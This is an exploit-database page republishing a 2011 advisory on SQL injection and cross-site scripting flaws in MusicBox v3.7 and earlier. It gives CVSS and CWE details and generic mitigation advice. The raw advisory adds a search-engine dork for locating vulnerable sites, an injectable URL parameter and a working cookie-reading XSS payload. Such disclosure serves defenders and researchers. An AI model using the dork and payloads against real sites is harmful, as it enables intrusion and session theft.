MusicBox - exploit.company

vendor:

MusicBox

by:

R@1D3N (amin emami)

8.8

CVSS

HIGH

SQL Injection and Cross Site Scripting

89 (SQL Injection) and 79 (Cross-site Scripting)

CWE

Product Name: MusicBox

Affected Version From: v3.7 and prior

Affected Version To: v3.7 and prior

Patch Exists: No

Related CWE: N/A

CPE: a:musicbox:musicbox

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Sp3

2011

MusicBox <= v3.7 Multiple Vulnerabilities

MusicBox versions 3.7 and prior are vulnerable to SQL injection and Cross Site Scripting attacks. An attacker can exploit these vulnerabilities by sending malicious SQL queries or malicious JavaScript code to the vulnerable application.

Mitigation:

To mitigate SQL injection attacks, user input should be validated and filtered before being used in SQL queries. To mitigate Cross Site Scripting attacks, user input should be validated and filtered before being used in the application.

Source

Exploit-DB raw data:

============================================================
MusicBox <= v3.7 Multiple Vulnerabilities
============================================================


[~] Author : R@1D3N (amin emami)

[~] Software Link : www.musicboxv2.com

[~] Price : $275

[~] Version : v3.7 and previous versions

[~] Contact : aminrayden@yahoo.com <~

[~] DorK : inurl:genre_artists.php

[~] Forum : http://ashiyane.org/forums/

[~] Greetz :ItSecTeam, Inj3ct0r, Exploit-db

[~] Tested on: Windows XP Sp3

vul1.sql injection:

/[Path]/index.php?action=top&type=Songs&show=10'[ SQL ATTACK]

Vul2.Cross site Scripting:

/[path]/index.php?in=song&term="><script>alert(document.cookie)<%2Fscript>&action=search&start=0